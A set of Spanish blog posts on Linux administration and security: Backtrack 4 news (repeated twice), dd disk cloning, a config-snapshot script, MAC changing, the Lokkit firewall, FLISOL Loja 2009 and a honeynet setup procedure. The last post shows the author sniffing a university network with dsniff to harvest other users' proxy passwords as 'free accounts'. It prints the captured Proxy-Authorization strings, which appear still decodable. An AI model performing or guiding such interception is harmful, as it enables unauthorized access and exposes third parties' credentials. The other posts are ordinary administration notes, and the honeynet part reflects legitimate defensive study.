Backtrack 4

Nuevamente tenemos noticias extraordinarias con esta distribución útil para auditoría informática, aunque todavía no sale la versión final, ya hay una PRE-Final, es algo así como la Release Candidate de los SO de Microsoft, ésta nueva versión contiene entre otras cosas:

-Migración a distribución base Ubuntu.- Es decir de ahora en adelante (al menos eso parece) backtrack deja de utilizar como base a SLAX (Slackware), pasándose a Ubuntu, entendiedo esto que todos los comandos y configuraciones de ubuntu son aplicables, como también comentar que cualquier Ubuntu podría ser backtrack-izada (palabra encontrada en ésta fuente).

-Mantiene los repositorios de BT y suma los de Ubuntu.

-Cambio se distribución base –> cambio de gestor de arranque, grub por lilo.

-Se podrá utilizar el apt-get de debian.

-Contiene las actualizaciones de drivers para más tarjetas Wireless

-Soporte PXE.

-Soporte RFID ¿Que es RFID?

-Nuevas herramientas de seguridad y en estas incluye una versión libre y completa de maltego.

Referencias

Segu-info

Blog backtrack

Nuevamente tenemos noticias extraordinarias con esta distribución útil para auditoría informática, aunque todavía no sale la versión final, ya hay una PRE-Final, es algo así como la Release Candidate de los SO de Microsoft, ésta nueva versión contiene entre otras cosas:

Migración a distribución base Ubuntu.- Es decir de ahora en adelante (al menos eso parece) backtrack deja de utilizar como base a SLAX (Slackware), pasándose a Ubuntu, entendiedo esto que todos los comandos y configuraciones de ubuntu son aplicables, como también comentar que cualquier Ubuntu podría ser backtrack-izada (palabra encontrada en ésta fuente).

Mantiene los repositorios de BT y suma los de Ubuntu.

Contiene las actualizaciones de drivers para más tarjetas Wireless

Soporte PXE.

Soporte RFID ¿Que es RFID?

Nuevas herramientas de seguridad y en estas incluye una versión libre y completa de maltego.

Clonar disco con dd

Este es un comando muy útil para sacar respaldos de un disco, clonarlo, y algunas otras carácterísticas. Tenemos un disco en un honeypot con ubuntu, ejecutamos el siguiente comando como root:

root# dd if=/dev/sda of=/dev/sdb bs=1024k

Donde if indíca el disco a clonar y of el disco donde se copiarán los datos.

bs=1024k es la opción que indíca el tamaño del bloque.

Usando este comando podemos clonar un disco completo de una forma sencilla, esto cumple una medida de seguridad y además obtener información de todo el sistema, con todos los archivos para su posterior análisis.

Sacar imagen en linux

EXTRAER IMAGEN DE LA CONFIGURACIÓN DEL SISTEMA

Este script contiene algunos comando utilizados para sacar la configuración de un sistema Linux en la versión Ubuntu, aplicado a un honeypot hemos obtenido resultados bastante buenos.

#! /bin/bash

hostname >> imagen

date -R >> imagen

fdisk -l >> imagen

df -Th >> imagen

ps aux >> imagen

route -nee >> imagen

cp /var/log/messages paso | cat paso >> imagen

cp /var/log/kern.log paso | cat paso >> imagen

cp /var/log/auth.log paso | cat paso >> imagen

cp /etc/hosts.deny paso | cat paso >> imagen

cp /etc/hosts.allow paso | cat paso >> imagen

ACLARACIÓN: Este script no saca la imagen total de un disco, para tal modo ver fdisk.

Casas de softare ¿Creadoras de virus?

Pajareando por el internet me encontré con esta cuestión, que para los informáticos noveles es una de las cuestiones de caja, y que normalmente mucha gente que maneja o tiene al menos una computadora comenta esta situación como verdadera, pero, ¿Qué tan cierta es esa afirmación?

¿Las desarrolladoras de software son las que crean virus?
Normalmente he escuchado “Hombre, los mismos que hacen los anti-virus son los que hacen los virus…..” – “….sino de que viven”, es un silogismo simple, pero que tiene una afirmación para nada confirmada (oficialmente hablando). Los cierto es que los virus son aplicaciones que destruyen, en el peor de los casos, pero la real existencia de estos se da gracias a las vulnerabilidades (voluntarias e involuntarias) que vienen con el software, errores propios de los sistemas operativos y las vulnerabilidades de estos y en algunos de los casos debido a características que proporcionan los propios sistemas.
El problema al desarrollar los sistemas operativos es que quienes los fabrican no alcanzan la perfección, lo intentan haciendo incluso liberaciones para con la ayuda de la comunidad encontrar errores (versiones beta), y luego de mitigar los errores más críticos y aplacar los de mediano y corto riesgo lanzan las versiones finales. Esta es una descripción escueta del proceso que sigue Microsoft con sus sistemas operativos, hizo lo mismo con Xp, paso con virus Vista y ahora con SEVEN.
Ahora se pensará que las versiones finales ya no tienen errores, en el caso de Microsoft si eso sucediera pues simplemente los Service Pack no existirían, y en el caso de las distintas distribuciones Linux y los demás sistemas operativos los parches no serían necesarios, pero pues lamentablemente no es así.

Así como hay casas desarrolladoras de software con personal de un conocimiento extraordinario en sistemas, también existen los del otro lado de la vereda, aquellos que conocen a la perfección los sistemas, inclusive sin haberlos desarrollado, estas personas están normalmente merodeando en la red para atacar equipos, y hoy en día y en gran medida son quienes aportan en la creación de aplicaciones que aprovechen vulnerabilidades (Llámese estas virus, rootkits, troyanos, keyloggers, bots, spam, etc.), con distintos fines, muchos con ganas de mejorar los sistemas (dañar algo para mejorarlo mmmmm), otros con ganas solamente de encontrar vulnerabilidades y muchos con ganas de dañar y ganar fama en el mundo black hat, claro que también están los que lo hacen solamente con ganas de joder la paciencia (La mayoría Lamers).
Así que por el momento les dejo las siguientes cuestiones:

¿Crees que los propios desarrolladores de software crean los virus?

¿Sino son ellos quienes? Y ¿Por qué?

Cambiar MAC

Buscando una forma sencilla de cambiar la mac de mi maquina encontré esta sencilla línea:

ifconfig <interfaz> hw <tipo de hardware> <dirección MAC>

Luego de esto es preferible reiniciar el servicio:

sudo /etc/init.d/networking restart

Para cambiar por defecto la dirección MAC ingresamos al directorio:

/etc/networks/ y en el archivo interfaces ubicamos una nueva línea: MACADDR=<DIRMAC>

Silenciar pitido del sistema

Hoy me tomé unos minutos para terminar con el problemita del pitido del sistema, ocurre que cuando ocupo la consolo (casi siempre) y regreso en la línea al final suena el pitido, y ya me estaba cansando, además que hoy una amiga me dijo por que no callas esa tontera? Y pues para quirtarme y quitarles el estresante sonidito utilicé lo siguiente:
$modprobe -r pcspkr
Accedemos a /etc/modprobe.d/blacklist para cambiar la configuración por defecto, si es lo deseado, abrimos el siguiente archivo: $ vi /etc/modprobe.d/blacklist
Y añadimos la línea: blacklist pcspkr.

He tomado la ayuda desde La maquina diferencial

LOKKIT

Normalmente o la costumbre es hablar sobre la seguridad sobre equipos con SO de Microsoft, cosas como configuar el firewall, un buen antivirus, uno q otro anti-troyano, etc. Pero que tal si se menciona algo de seguridad sobre linux en equipos finales.

Asi tenemos ésta aplicacion, LOKKIT, un firewall tan sencillo de configurar que te permite como usuario final tener un poco más de seguridad cuando navegas por la red.

En el ubuntu8.10 obtengo una pantalla similar a esta:

Aqui debes determinar que grado de firewall necesitas, alto, medio o arriesgate sin nada, luego en el boton Customize, se puede detallar un tanto más los servicios que deseamos negar, claro los más conocidos, pero si deseamos cerrar alguna aplicación como pop o dns solamente debemos especificar los puertos y listo.

Algo que falta acotar es que este firewall es de los más sencillos para linux, no es muy bueno cuando tratemos de aplicar reglas más complejas y fuertes al equipo.

Fuente

FLISOL LOJA 2009

Este fin de semana tendrá a efecto el Festival Latinoamericano de Instalación de software libre, cito lo siguiente del blog de la Escuela de Sistemas:

El Festival Latinoamericano de Instalación de Softaware Libre, está dirigido a todo tipo de público estudiantes, académicos, empresarios, trabajadores, funcionarios públicos, entusiastas y aun personas que no poseen mucho conocimiento informático, así que ya sabes te esperamos con los brazos abiertos en hora buena si llevas tu computadora.

El festival tendrá efecto éste sabado desde las 9 de la mañana hasta las cuatro de la tarde, en los patios del Instituto Tecnológico Superior Sudamericano, mayores pormenores en la wiki oficial
.

Espero una buena asistencia, demosle chance al software libre, voy a utilizar la típica frase de venta busetera, si no le gusta lo devuelve jajaja.

En el festival estaré aportando con una pequeña exposición sobre seguridad para usuarios finales y algo de experiencia en linux.

Si es posible lleva un par de dvds para que te lleves buen software libre y gratis….

Honeynets test procedures

Deployment prodecure

1. The hard disk must be written with a constant data pattern (usually zeros). This procedure also has the benefit that disk image copies compress better, and that deleted files are easier to find.

2. The chosen operating system is installed. Default options.

3. The chosen services are installed, configured and initialized.

4. The honeypot’s configuration script is executed to create new users, configure the network settings, etc.

5. In order to monitor the attacker’s steps, keystroke recording system are configured in the honeypot. These systems can send the commands typed by an attacker to a loghost, using the syslog system, and broadcast this information directly into the network.

6. A script to generate the MD5 and SHA1 hashes of the honeypot’s files is executed. The hashes can be used later to discover which files have been changed by an attacker.

NOTE. Some authors could recommend extract a entire copy (image) of the honeynet with the purpose of a future test with the original configurations.

7. A script to generate the system’s status is executed. This is composed of the output of some Unix commands like ps, netstat, lsof, socklist and df.

8. The MD5 and SHA1 hashes and the system’s status files are stored in a loghost in the administration subnet which stores also the system’s images.

9. Traces of the steps (5-8) above are erased.

10. The system’s image is generated and exported to the loghost.

11. The new honeypot is connected in the honeynet and monitored until the moment when it will be turned off.

I’m going to try with this procedure……

That is a extract of honeynets maintanence and tools, June 2005.

Cuentas proxy gratis

Con un simple comando he podido obtener algunas claves para autenticación con el proxy de la red interna de la utpl, es muy sencillo
root: dsniff -d -i eth0

dsniff: trigger_tcp: decoding port 3128 as http
—————–
04/01/09 05:19:53 tcp 172.16.25.154.22994 -> gdr4.utpl.edu.ec.3128 (http)
GET http://www.hlatorre.com/images/back_izq8.gif HTTP/1.1
Host: www.hlatorre.com
Proxy-Authorization: Basic aGZnb21lejo5OTQ4Mw== [h¶g¹mºz:¼Á4À3]

dsniff: trigger_tcp: decoding port 3128 as http
—————–
04/01/09 05:19:58 tcp 172.16.25.159.42177 -> gdr4.utpl.edu.ec.3128 (http)
CONNECT certs.opera.com:443 HTTP/1.0
Host: certs.opera.com:443
Proxy-Authorization: Basic anBhbmdhbWFyY2E6cXVlY2h1Y2hhdG

VpbXBvcnRh
[°p±nµa¸aºc¼:qu§c¦u¥h®t°iµµp¶rtº]

Es algo tan sencillo no? cualquiera puede utilizar este tipo de herramientas, es muy sencillo encontrarlas e instalarlas, pero, por tal razón hay que tomar medidas, puesto que cualquiera puede ponerse a escuchar las contraseñas en una inalambrica y sacar las claves, como se muestran aqui.
Además e puesto caracteres especiales en los usuarios y contraseñas, la presenta es solo una muestra, un amigo se atravesó con su clave y pues lamentablemente no pude hacer nada dsniff la sacó.